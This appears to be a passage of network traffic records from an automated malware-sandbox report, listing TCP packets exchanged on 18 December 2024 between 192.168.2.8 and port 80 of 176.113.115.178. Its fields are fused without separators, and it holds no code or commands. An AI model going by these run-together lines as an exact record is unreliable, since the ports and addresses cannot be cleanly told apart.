                                                  Dec 18, 2024 14:07:36.737679958 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.752908945 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.752927065 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.753051043 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.753235102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.753436089 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.753490925 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.754129887 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.754463911 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.754513979 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.754543066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.755311012 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.755362034 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.755422115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.756191969 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.756213903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.756247997 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.757045984 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.757086039 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.757153034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.757966042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.758016109 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.758105040 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.758825064 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.758840084 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.758869886 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.759682894 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.759721041 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.759732008 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.760483980 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.760526896 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.760600090 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.761454105 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.761501074 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.761526108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.762237072 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.762283087 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.762326002 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.763063908 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.763111115 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.763242960 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.763963938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.764012098 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.764054060 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.764873981 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.764923096 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.765064955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.765723944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.765772104 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.765829086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.766623020 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.766635895 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.766673088 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.767469883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.767483950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.767532110 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.768353939 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.768412113 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.768466949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.769212961 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.769260883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.769263029 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.770030975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.770080090 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.770133972 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.771028042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.771040916 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.771078110 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.771775007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.771867037 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.771910906 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.772638083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.772681952 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.772715092 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.773583889 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.773602962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.773632050 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.774384975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.774430990 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.774472952 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.775191069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.775238037 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.775274992 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.776103973 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.776159048 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.776221991 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.777084112 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.777124882 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.777262926 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.777923107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.777966022 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.777997017 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.778687000 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.778727055 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.778908968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.779551983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.779593945 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.779675007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.780405998 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.780447006 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.780642986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.781517029 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.781563044 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.781579018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.782203913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.782237053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.782246113 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.783170938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.783184052 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.783225060 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.784090996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.784136057 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.784276962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.785022974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.785058022 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.785078049 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.785689116 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.785736084 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.785834074 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.786530018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.786597013 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.874438047 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.874484062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.874553919 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.874846935 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.874933958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.874980927 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.875741005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.875957012 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.876004934 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.876646996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.876869917 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.876914024 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.876993895 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.877803087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.877841949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.877887011 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.878578901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.878642082 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.878779888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.879626989 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.879707098 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.879740953 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.880330086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.880405903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.880417109 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.881370068 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.881383896 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.881637096 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.882090092 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.882181883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.882186890 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.882942915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.883060932 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.883203030 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.883802891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.883873940 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.884012938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.884674072 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.884705067 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.884718895 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.925168037 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.983419895 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.983493090 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.983550072 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.983997107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.984009027 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.984169006 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.984613895 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.984626055 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.984721899 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.985354900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.985382080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.985450983 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.986308098 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.986320019 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.986406088 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.987145901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.987309933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.987401962 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.988024950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.988128901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.988209963 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.988751888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.988828897 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.988899946 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.989653111 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.989671946 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.989748001 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.990518093 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.990577936 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.990648985 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.991545916 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.991619110 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.991694927 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.992295980 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.992419004 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.992645979 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.993169069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.993316889 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.993947029 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.994072914 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.994077921 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.994112968 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.994932890 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.994945049 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.995040894 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.995691061 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.995704889 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.995809078 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.996570110 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.996668100 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.997596025 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.997652054 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.997852087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.998493910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.998580933 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.998656988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.998723984 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.999243021 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.999284029 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.999363899 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.000216961 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.000289917 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.000458002 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.000982046 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.001230955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.001358032 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.001899004 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.002022982 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.002120972 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.002584934 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.002688885 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.003483057 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.003515959 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.003658056 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.003707886 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.004426003 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.004627943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.004684925 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.005214930 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.005327940 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.005409002 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.006097078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.006253958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.007044077 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.007118940 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.007138968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.008011103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.008122921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.008158922 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.008158922 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.008692980 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.008774996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.008933067 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.009629011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.009643078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.009736061 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.010428905 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.010591984 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.011382103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.011439085 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.011461973 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.012141943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.012193918 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.012371063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.012418032 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.013098001 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.013180017 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.013233900 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.014070988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.014082909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.014178038 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.015016079 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.015034914 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.015116930 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.015614033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.015690088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.016484976 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.016530037 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.016556978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.018124104 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.066382885 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.066477060 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.066545963 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.066603899 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.066648006 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.067682028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.067743063 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.067765951 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.067810059 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.068582058 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.068754911 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.068804026 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.069294930 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.069492102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.069912910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.069956064 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.070019960 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.070559978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.070631027 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.070882082 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.070991039 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.071458101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.071631908 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.071677923 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.072289944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.072441101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.072674036 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.073168039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.073323965 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.074150085 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.074167013 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.074199915 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.074220896 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.075156927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.075364113 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.075409889 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.075969934 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.076179981 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.076225996 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.076677084 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.076817989 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.076864004 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.205060005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.205236912 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.205291033 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.205542088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.205760956 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.205775023 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.205976963 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.206456900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.206510067 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.206594944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.207344055 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.207431078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.207468033 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.208344936 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:37.208396912 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:37.208477974 CET8049707176.113.115.178192.168.2.8
